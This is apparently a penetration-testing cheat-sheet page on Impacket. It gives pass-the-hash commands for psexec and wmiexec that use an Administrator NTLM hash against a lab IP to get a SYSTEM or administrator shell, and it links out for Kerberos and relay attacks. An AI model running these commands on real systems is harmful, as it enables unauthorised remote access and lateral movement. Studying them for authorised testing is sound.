Impacket

Pass-the-Hash

psexec uploads a service executable to a writable share, registers it as a service, and starts it (requires write access to a share). If no argument is specified at the end of the command, it runs cmd.exe by default giving us a SYSTEM shell.

# SYSTEM shell
$ impacket-psexec -hashes :7a38310ea6f0027ee955abed1762964b Administrator@192.168.233.212

# RCE
$ impacket-psexec -hashes :7a38310ea6f0027ee955abed1762964b Administrator@192.168.233.212 <command>

wmiexec uses Windows Management Instrumentation (WMI) to execute commands remotely without needing to upload files or write to shares (stealthier and faster). If no argument is specified at the end of the command, it runs cmd.exe by default giving us a user shell.

# Administrator shell
$ impacket-wmiexec -hashes :7a38310ea6f0027ee955abed1762964b Administrator@192.168.233.212

AS-REPRoasting

See how to use impacket-GetNPUsers here.

Kerberoasting

See how to use impacket-GetUserSPNs here.

NTML Relay

See how to use impacket-ntlmrelayx here.

Local SAM Dump

See how to use impacket-secretsdump here.

PreviousBloodHound NextKerbrute

Last updated 15 days ago

hashtagPass-the-Hash

hashtagAS-REPRoasting

hashtagKerberoasting

hashtagNTML Relay

hashtagLocal SAM Dump

Pass-the-Hash

AS-REPRoasting

Kerberoasting

NTML Relay

Local SAM Dump